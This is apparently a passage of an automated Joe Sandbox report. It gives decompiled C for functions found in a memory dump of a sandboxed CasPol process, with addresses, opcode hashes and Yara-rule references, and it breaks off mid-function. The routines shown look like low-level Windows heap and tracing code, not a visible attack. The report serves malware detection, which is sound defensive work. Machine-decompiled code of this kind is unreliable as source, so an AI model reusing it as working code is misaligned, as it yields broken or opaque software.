                                                                        0x013f9160
                                                                        0x013f9168
                                                                        0x013f916c
                                                                        0x013f91bc
                                                                        0x013f91be
                                                                        0x00000000
                                                                        0x013f91be
                                                                        0x013f916e
                                                                        0x013f9173
                                                                        0x013f9176
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f917c
                                                                        0x013f9180
                                                                        0x013f91b5
                                                                        0x00000000
                                                                        0x013f91b5
                                                                        0x013f9182
                                                                        0x013f9185
                                                                        0x013f9189
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f918e
                                                                        0x013f9190
                                                                        0x013f9198
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013f91a0
                                                                        0x00000000
                                                                        0x013f91ad
                                                                        0x013f91ad
                                                                        0x013f91b0
                                                                        0x013f91b1
                                                                        0x00000000
                                                                        0x013f9185
                                                                        0x013f911a
                                                                        0x013f911c
                                                                        0x013f911f
                                                                        0x013f9125
                                                                        0x013f9127
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                        • Instruction ID: 2bb3fc72e1e8303b5793aad83569c3a576201803149c70ffb0e8870bce15f93b
                                                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                        • Instruction Fuzzy Hash: F9217F71A00209EFDB21DF59C844FAAFBF8EB58718F14887EFA45A7651D230E9048B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E3B7A Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E013E3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x14a84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x14a84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x14a84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E013FAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E013FFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x14a84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x14a84c4; // 0x0
					L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                        0x013e3b89
                                                                        0x013e3b96
                                                                        0x013e3ba1
                                                                        0x013e3bab
                                                                        0x013e3bb5
                                                                        0x013e3bb9
                                                                        0x01426298
                                                                        0x013e3bbf
                                                                        0x013e3bc2
                                                                        0x013e3bc3
                                                                        0x013e3bc9
                                                                        0x013e3bca
                                                                        0x013e3bcc
                                                                        0x013e3bcd
                                                                        0x013e3bd4
                                                                        0x013e3bd6
                                                                        0x013e3bdb
                                                                        0x013e3bea
                                                                        0x013e3bf7
                                                                        0x013e3bfb
                                                                        0x013e3bff
                                                                        0x013e3c09
                                                                        0x013e3c0a
                                                                        0x013e3c0b
                                                                        0x013e3c0f
                                                                        0x013e3c14
                                                                        0x013e3c18
                                                                        0x013e3c18
                                                                        0x013e3bfb
                                                                        0x013e3c1b
                                                                        0x013e3c30
                                                                        0x013e3c30
                                                                        0x013e3c3d

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 022c10046a1f9b869249fdcc94ed1ba17d01fec4357cbf766f1f11719588f138
                                                                        • Instruction ID: 5b5a7ba88965a16148b408d53c13fedd9106c680bf52c0c0472e6aa23d671084
                                                                        • Opcode Fuzzy Hash: 022c10046a1f9b869249fdcc94ed1ba17d01fec4357cbf766f1f11719588f138
                                                                        • Instruction Fuzzy Hash: D821A4B2A00119AFDB10DF58DD81F5ABBBDFB44708F150178EA09AB251D371ED15CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01436CF0 Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E01436CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E013D7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E013D7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1395c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E013EF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E013EF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01437016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L013D2400( &_v52);
								}
								_t21 = L013D2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                        0x01436cfb
                                                                        0x01436d00
                                                                        0x01436d02
                                                                        0x01436d06
                                                                        0x01436d0a
                                                                        0x01436d0e
                                                                        0x01436d19
                                                                        0x01436d2b
                                                                        0x01436d1b
                                                                        0x01436d24
                                                                        0x01436d24
                                                                        0x01436d33
                                                                        0x01436d39
                                                                        0x01436d46
                                                                        0x01436d4f
                                                                        0x01436d61
                                                                        0x01436d51
                                                                        0x01436d5a
                                                                        0x01436d5a
                                                                        0x01436d69
                                                                        0x01436d6b
                                                                        0x01436d6d
                                                                        0x01436d6f
                                                                        0x01436d6f
                                                                        0x01436d74
                                                                        0x01436d79
                                                                        0x01436d7a
                                                                        0x01436d7f
                                                                        0x01436d82
                                                                        0x01436d88
                                                                        0x01436d89
                                                                        0x01436d90
                                                                        0x01436d94
                                                                        0x01436da7
                                                                        0x01436db1
                                                                        0x01436db1
                                                                        0x01436dbb
                                                                        0x01436dbb
                                                                        0x01436d90
                                                                        0x01436d69
                                                                        0x01436d46
                                                                        0x01436dc6

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec050be956c9107578474ee92773c455b50aac0e3865d43d1d2f6f045affde25
                                                                        • Instruction ID: 7d32d417e881fcb73fe1e03a9e125cc4bb03f85a913db938032fdaf8f212962b
                                                                        • Opcode Fuzzy Hash: ec050be956c9107578474ee92773c455b50aac0e3865d43d1d2f6f045affde25
                                                                        • Instruction Fuzzy Hash: 6E212272400346ABD711DF2CD948B6BBBECAFD5248F050457FA80C7260E734CA4AC6A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0148070D Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E0148070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E014807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0147AFDE( &_v8,  &_v12);
					E01481293(_t38, _v28, _t60);
					if(E013D7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E014714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                        0x0148071b
                                                                        0x01480724
                                                                        0x01480734
                                                                        0x01480738
                                                                        0x0148074b
                                                                        0x0148074b
                                                                        0x01480753
                                                                        0x01480753
                                                                        0x01480759
                                                                        0x0148075d
                                                                        0x01480774
                                                                        0x01480779
                                                                        0x0148077d
                                                                        0x01480789
                                                                        0x01480795
                                                                        0x014807a7
                                                                        0x01480797
                                                                        0x014807a0
                                                                        0x014807a0
                                                                        0x014807af
                                                                        0x014807c4
                                                                        0x014807cd
                                                                        0x014807cd
                                                                        0x014807af
                                                                        0x014807dc

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                        • Instruction ID: d7b61a4b34ff576e182ca9345a623b685912c318ad291069bf3a1c4cbb48f726
                                                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                        • Instruction Fuzzy Hash: 9E21F2362042009FD715EF28C890BAABBA5EBD4750F04856EF9959B3A5D630D909CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01482EF7 Relevance: .1, Instructions: 72COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 35%
                                                                        			E01482EF7(void* __ecx, signed int __edx, void* _a8, signed int _a12) {
				char _v5;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				void* _t71;
				signed int _t94;
				signed int _t105;
				signed int _t106;
				void* _t107;
				signed int _t114;
				signed int _t115;
				signed int _t141;
				signed int _t142;
				signed char _t145;
				signed char _t146;
				void* _t154;
				signed int _t155;
				void* _t156;
				signed int _t160;
				signed int _t164;
				void* _t165;
				signed int _t172;
				signed int _t174;

				_push(__ecx);
				_push(__ecx);
				_t105 = __edx;
				_t154 = __ecx;
				_t160 =  *__edx ^ __edx;
				_t141 =  *(__edx + 4) ^ __edx;
				if(( *(_t160 + 4) ^ _t160) != __edx || ( *_t141 ^ _t141) != __edx) {
					_t114 = 3;
					asm("int 0x29");
					_t174 = (_t172 & 0xfffffff8) - 0x24;
					_t62 =  *0x14ad360 ^ _t174;
					_v32 = _t62;
					_push(_t105);
					_push(_t160);
					_t106 = _t114;
					_t115 = _v20;
					_push(_t154);
					_t155 = _t141;
					_t142 = _v16;
					__eflags = _t115;
					if(__eflags != 0) {
						asm("bsf esi, ecx");
					} else {
						asm("bsf esi, edx");
						_t62 = (_t62 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff;
						__eflags = _t62;
						if(_t62 == 0) {
							_t160 = _v44;
						} else {
							_t160 = _t160 + 0x20;
						}
					}
					__eflags = _t142;
					if(__eflags == 0) {
						asm("bsr eax, ecx");
					} else {
						asm("bsr ecx, edx");
						if(__eflags == 0) {
							_t62 = _v44;
						} else {
							_t27 = _t115 + 0x20; // 0x20
							_t62 = _t27;
						}
					}
					_v56 = (_t160 << 0xc) + _t155;
					_v60 = _t62 - _t160 + 1 << 0xc;
					_t71 = E013FD0F0(1, _t62 - _t160 + 1, 0);
					asm("adc edx, 0xffffffff");
					_v52 = E013FD0F0(_t71 + 0xffffffff, _t160, 0);
					_v48 = 0;
					_v44 = _t155 + 0x10;
					E013D2280(_t155 + 0x10, _t155 + 0x10);
					__eflags = _a12;
					_push(_v64);
					_push(_v60);
					_push( *((intOrPtr*)(_t106 + 0x20)));
					if(_a12 == 0) {
						 *0x14ab1e0();
						 *( *(_t106 + 0x30) ^  *0x14a6110 ^ _t106)();
						 *(_t155 + 0xc) =  *(_t155 + 0xc) &  !_v60;
						_t54 = _t155 + 8;
						 *_t54 =  *(_t155 + 8) &  !_v64;
						__eflags =  *_t54;
						goto L18;
					} else {
						 *0x14ab1e0();
						_t164 =  *( *(_t106 + 0x2c) ^  *0x14a6110 ^ _t106)();
						__eflags = _t164;
						if(_t164 >= 0) {
							 *(_t155 + 8) =  *(_t155 + 8) | _v64;
							 *(_t155 + 0xc) =  *(_t155 + 0xc) | _v60;
							L18:
							asm("lock xadd [eax], ecx");
							_t164 = 0;
							__eflags = 0;
						}
					}
					E013CFFB0(_t106, _t155, _v56);
					_pop(_t156);
					_pop(_t165);
					_pop(_t107);
					__eflags = _v48 ^ _t174;
					return E013FB640(_t164, _t107, _v48 ^ _t174, 0, _t156, _t165);
				} else {
					_t94 = _t141 ^ _t160;
					 *_t141 = _t94;
					 *(_t160 + 4) = _t94;
					_t145 =  !( *(__edx + 8));
					_t146 = _t145 >> 8;
					_v12 = _t146 >> 8;
					_v5 =  *((intOrPtr*)((_t145 & 0x000000ff) + 0x139ac00)) +  *((intOrPtr*)((_t146 & 0x000000ff) + 0x139ac00));
					asm("lock xadd [eax], edx");
					return __ecx + 0x18;
				}
			}






































                                                                        0x01482efc
                                                                        0x01482efd
                                                                        0x01482eff
                                                                        0x01482f03
                                                                        0x01482f0a
                                                                        0x01482f0c
                                                                        0x01482f15
                                                                        0x01482fba
                                                                        0x01482fbb
                                                                        0x01482fc5
                                                                        0x01482fcd
                                                                        0x01482fcf
                                                                        0x01482fd3
                                                                        0x01482fd4
                                                                        0x01482fd5
                                                                        0x01482fd7
                                                                        0x01482fda
                                                                        0x01482fdb
                                                                        0x01482fdd
                                                                        0x01482fe0
                                                                        0x01482fe2
                                                                        0x01482ffc
                                                                        0x01482fe4
                                                                        0x01482fe4
                                                                        0x01482fea
                                                                        0x01482fed
                                                                        0x01482fef
                                                                        0x01482ff6
                                                                        0x01482ff1
                                                                        0x01482ff1
                                                                        0x01482ff1
                                                                        0x01482fef
                                                                        0x01482fff
                                                                        0x01483001
                                                                        0x0148301b
                                                                        0x01483003
                                                                        0x01483003
                                                                        0x0148300e
                                                                        0x01483015
                                                                        0x01483010
                                                                        0x01483010
                                                                        0x01483010
                                                                        0x01483010
                                                                        0x0148300e
                                                                        0x0148302c
                                                                        0x01483035
                                                                        0x0148303c
                                                                        0x01483046
                                                                        0x0148304e
                                                                        0x01483056
                                                                        0x0148305a
                                                                        0x0148305e
                                                                        0x01483063
                                                                        0x01483067
                                                                        0x0148306b
                                                                        0x0148306f
                                                                        0x01483072
                                                                        0x014830af
                                                                        0x014830b5
                                                                        0x014830c1
                                                                        0x014830c9
                                                                        0x014830c9
                                                                        0x014830c9
                                                                        0x00000000
                                                                        0x01483074
                                                                        0x01483081
                                                                        0x01483089
                                                                        0x0148308b
                                                                        0x0148308d
                                                                        0x01483093
                                                                        0x0148309a
                                                                        0x014830ce
                                                                        0x014830d1
                                                                        0x014830d5
                                                                        0x014830d5
                                                                        0x014830d5
                                                                        0x0148308d
                                                                        0x014830db
                                                                        0x014830e6
                                                                        0x014830e7
                                                                        0x014830e8
                                                                        0x014830e9
                                                                        0x014830f3
                                                                        0x01482f27
                                                                        0x01482f29
                                                                        0x01482f2b
                                                                        0x01482f2d
                                                                        0x01482f36
                                                                        0x01482f3d
                                                                        0x01482f4c
                                                                        0x01482f58
                                                                        0x01482fad
                                                                        0x01482fb7
                                                                        0x01482fb7

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b3303a6532fb0da457978e93413a733bf692ee958e66366169d4688386de243d
                                                                        • Instruction ID: 6be8d1cb21aa7472b522e2768f426f1fcc6495a2503b145aff4e714f59883c2b
                                                                        • Opcode Fuzzy Hash: b3303a6532fb0da457978e93413a733bf692ee958e66366169d4688386de243d
                                                                        • Instruction Fuzzy Hash: F021BB712041A00FDB05CF1AC8B45B6BFE5EFC611235A82E6D988CF783C934941ADFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EABD8 Relevance: .1, Instructions: 70COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E013EABD8(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				signed char _t22;
				intOrPtr _t31;
				signed char _t34;
				signed char _t42;
				unsigned int _t44;
				void* _t49;
				signed int* _t53;

				_push(__ecx);
				_t49 = __ecx;
				_t18 = __ecx + 0xc0;
				_t31 =  *((intOrPtr*)(_t18 + 4));
				while(_t31 != _t18) {
					_t9 = _t31 - 8; // -8
					_t53 = _t9;
					if( *(_t49 + 0x4c) != 0) {
						_t44 =  *(_t49 + 0x50) ^  *_t53;
						 *_t53 = _t44;
						_t38 = _t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44;
						if(_t44 >> 0x18 != (_t44 >> 0x00000010 ^ _t44 >> 0x00000008 ^ _t44)) {
							E0146FA2B(_t31, _t49, _t53, _t49, _t53, __eflags, _t38);
						}
					}
					_t34 =  *_t53 & 0x0000ffff;
					_t18 = 0x200;
					_t42 = _t34 >> 8;
					if(_t34 <= 0x200) {
						__eflags =  *(_t49 + 0x4c);
						if( *(_t49 + 0x4c) != 0) {
							_t53[0] = _t53[0] ^ _t42 ^ _t34;
							_t18 =  *(_t49 + 0x50);
							 *_t53 =  *_t53 ^ _t18;
							__eflags =  *_t53;
						}
						break;
					}
					_t22 = _t53[0];
					if((_t22 & 0x00000008) != 0) {
						__eflags =  *(_t49 + 0x4c);
						if(__eflags != 0) {
							_t53[0] = _t22 ^ _t42 ^ _t34;
							 *_t53 =  *_t53 ^  *(_t49 + 0x50);
							__eflags =  *_t53;
						}
					} else {
						E013EAC7B(_t49, _t53);
					}
					_t31 =  *((intOrPtr*)(_t31 + 4));
					_t18 = _t49 + 0xc0;
				}
				return _t18;
			}















                                                                        0x013eabe0
                                                                        0x013eabe4
                                                                        0x013eabe6
                                                                        0x013eabec
                                                                        0x013eac0c
                                                                        0x013eac14
                                                                        0x013eac14
                                                                        0x013eac17
                                                                        0x013eac1c
                                                                        0x013eac20
                                                                        0x013eac2c
                                                                        0x013eac33
                                                                        0x01429f40
                                                                        0x01429f40
                                                                        0x013eac33
                                                                        0x013eac39
                                                                        0x013eac3c
                                                                        0x013eac44
                                                                        0x013eac4b
                                                                        0x013eac5f
                                                                        0x013eac63
                                                                        0x013eac6c
                                                                        0x013eac6f
                                                                        0x013eac72
                                                                        0x013eac72
                                                                        0x013eac72
                                                                        0x00000000
                                                                        0x013eac63
                                                                        0x013eac4d
                                                                        0x013eac52
                                                                        0x013eabf1
                                                                        0x013eabf5
                                                                        0x013eabfb
                                                                        0x013eac01
                                                                        0x013eac01
                                                                        0x013eac01
                                                                        0x013eac54
                                                                        0x013eac58
                                                                        0x013eac58
                                                                        0x013eac03
                                                                        0x013eac06
                                                                        0x013eac06
                                                                        0x013eac7a

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                                                        • Instruction ID: 1503162f6eb4ee3db89110cb12b708e38f471f52b5d5ff0a1f87dcefdfd4ad61
                                                                        • Opcode Fuzzy Hash: 6d1d207ce53efa8c22bf27fbc4c7e5f30861c9883542d2abfefc5c8e464cac72
                                                                        • Instruction Fuzzy Hash: 9921E7302007669BDF289F2DC4986F2BBD5EB99308F54821AD5D5C7681D730B81ADB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01481FF1 Relevance: .1, Instructions: 70COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 77%
                                                                        			E01481FF1(void* __ecx, intOrPtr __edx, signed int _a4) {
				intOrPtr _v8;
				signed int _t22;
				signed int _t34;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				signed int _t44;
				signed int _t54;
				signed int _t55;

				_t44 = _a4;
				_v8 = __edx;
				_t3 = _t44 + 0x1007; // 0x1007
				_t41 = _t3 & 0xfffff000;
				_t54 = ( *_t44 ^  *0x14a6110 ^ _t44) >> 0x00000001 & 0x00007fff;
				if(_t41 - _t44 < _t54 << 3) {
					_t42 = _t41 + 0xfffffff0;
					_t34 = _t42 - _t44 >> 3;
					_t55 = _t54 - _t34;
					 *_t44 =  *_t44 ^ (_t34 + _t34 ^  *_t44 ^  *0x14a6110 ^ _t44) & 0x0000fffe;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_t22 = ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff) + ((_t34 & 0x00007fff) << 0x0000000f | _t55 & 0x00007fff);
					 *_t42 = _t22;
					_t38 = _t42 + _t55 * 8;
					 *_t42 = _t22 ^  *0x14a6110 ^ _t42;
					if(_t38 < _v8 + (( *(_v8 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t38 =  *_t38 ^ (_t55 << 0x00000010 ^  *0x14a6110 ^ _t38 ^  *_t38) & 0x7fff0000;
					}
				} else {
					_t42 = 0;
				}
				return _t42;
			}












                                                                        0x01481ff9
                                                                        0x01481ffc
                                                                        0x01482001
                                                                        0x0148200d
                                                                        0x0148201b
                                                                        0x01482028
                                                                        0x0148202e
                                                                        0x01482035
                                                                        0x01482038
                                                                        0x0148204c
                                                                        0x01482052
                                                                        0x01482053
                                                                        0x01482054
                                                                        0x01482055
                                                                        0x01482069
                                                                        0x0148206c
                                                                        0x0148206e
                                                                        0x01482079
                                                                        0x01482087
                                                                        0x0148209c
                                                                        0x0148209c
                                                                        0x0148202a
                                                                        0x0148202a
                                                                        0x0148202a
                                                                        0x014820a5

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 530524e90264da69ea87ce1e93d804af158bdccad26c19a42f70393d8aec637e
                                                                        • Instruction ID: a40661ce9cf3eec6550387929f326f82359a19e50fd38297c58884b47aaff036
                                                                        • Opcode Fuzzy Hash: 530524e90264da69ea87ce1e93d804af158bdccad26c19a42f70393d8aec637e
                                                                        • Instruction Fuzzy Hash: 4921D533A104119B8719CF3CC80146AFBE6EF8D21036B467BD922DB265DA70BD11CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01437794 Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E01437794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x14a7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E013FF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E013D7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E013F9AE0();
					_t24 = L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                        0x01437799
                                                                        0x0143779a
                                                                        0x0143779b
                                                                        0x014377a3
                                                                        0x014377ab
                                                                        0x014377ae
                                                                        0x014377b1
                                                                        0x014377b1
                                                                        0x014377bf
                                                                        0x014377c4
                                                                        0x014377c8
                                                                        0x014377ce
                                                                        0x014377d4
                                                                        0x014377e0
                                                                        0x014377e0
                                                                        0x014377d6
                                                                        0x014377d6
                                                                        0x014377de
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014377de
                                                                        0x014377e5
                                                                        0x014377f0
                                                                        0x014377f3
                                                                        0x014377f6
                                                                        0x014377fd
                                                                        0x01437800
                                                                        0x0143780c
                                                                        0x01437818
                                                                        0x0143782b
                                                                        0x0143781a
                                                                        0x01437823
                                                                        0x01437823
                                                                        0x01437830
                                                                        0x01437831
                                                                        0x01437838
                                                                        0x0143783d
                                                                        0x0143783e
                                                                        0x0143784f
                                                                        0x0143784f
                                                                        0x0143785a

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: faea791759026ea73a4ecb59551001177ecd547e3d512def1935f7d9f2b07817
                                                                        • Instruction ID: 7f30662390b07e4f779ab233b33011d35c7213e14b1128eabc6b4a14603803e1
                                                                        • Opcode Fuzzy Hash: faea791759026ea73a4ecb59551001177ecd547e3d512def1935f7d9f2b07817
                                                                        • Instruction Fuzzy Hash: 0921A1B2900604AFC725DF69D880E6BBBA8EF8C344F10056EF60AC7760D734E900CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DAE73 Relevance: .1, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E013DAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E013D7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
